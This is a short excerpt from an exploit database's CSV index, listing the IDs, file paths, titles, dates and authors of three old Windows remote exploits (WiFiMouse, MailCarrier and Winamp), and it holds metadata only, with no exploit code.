51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",2022-09-21,"FEBIN MON SAJI",remote,windows,,2022-09-21,2022-09-21,0,,,,,,
47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,,2019-10-29,2021-01-25,0,,,,,,
418,exploits/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",remote,windows,,2004-08-24,2017-08-14,1,OSVDB-9195;CVE-2004-0820,,skinhead.rar,,http://www.exploit-db.comwinamp504.exe,

Can't render this file because it is too large.